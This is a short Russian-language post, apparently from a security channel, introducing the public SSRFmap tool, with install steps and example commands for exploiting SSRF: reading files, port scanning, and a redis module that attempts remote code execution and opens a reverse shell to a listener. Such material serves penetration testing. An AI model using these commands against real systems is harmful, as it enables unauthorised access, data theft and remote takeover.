Проверенный временем, инструмент для автоматизации SSRF атак, поддерживающий большое количество модулей, кодирование нагрузки для bypass'а WAF'ов, создание reverse shell соединения
☄️ https://github.com/swisskyrepo/SSRFmap ☄️
Ставим на хост
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py
Поднимаем докер
git clone https://github.com/swisskyrepo/SSRFmap
docker build --no-cache -t ssrfmap .
docker run -it ssrfmap ssrfmap.py [OPTIONS]
docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
Пример команды, где опция
-r —> запрос, сохраненный из Burp Suite, -p —> тестируемый параметр, -m —> используемые модулиpython ssrfmap.py -r request.txt -p url -m readfiles,portscan
Используем модуль
redis, который сразу пробует проэксплуатировать RCE, где параметры LHOST и LPORT служат для создания reverse shellpython ssrfmap.py -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
И в конце небольшой Cheat Sheet по SSRF 💫
